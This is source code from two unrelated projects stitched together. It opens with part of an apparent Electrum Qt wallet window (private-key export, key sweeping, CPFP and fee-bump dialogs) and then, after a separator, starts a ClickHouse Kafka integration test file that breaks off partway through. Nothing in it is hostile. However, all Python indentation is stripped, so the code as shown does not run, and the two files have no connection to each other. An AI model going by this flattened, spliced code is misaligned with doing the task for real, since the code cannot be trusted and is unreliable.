str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(
tx=tx,
txid=txid,
new_fee_rate=new_fee_rate,
coins=self.get_coins(),
)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Cancel transaction'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
except CannotDoubleSpendTx as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def describe_consumer_group(kafka_cluster, name):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
consumer_groups = admin_client.describe_consumer_groups([name])
res = []
for member in consumer_groups[0].members:
member_info = {}
member_info['member_id'] = member.member_id
member_info['client_id'] = member.client_id
member_info['client_host'] = member.client_host
member_topics_assignment = []
for (topic, partitions) in member.member_assignment.assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available() # ensure kafka is alive
kafka_producer_send_heartbeat_msg() # ensure python kafka client is ok
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
@pytest.mark.timeout(120)
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
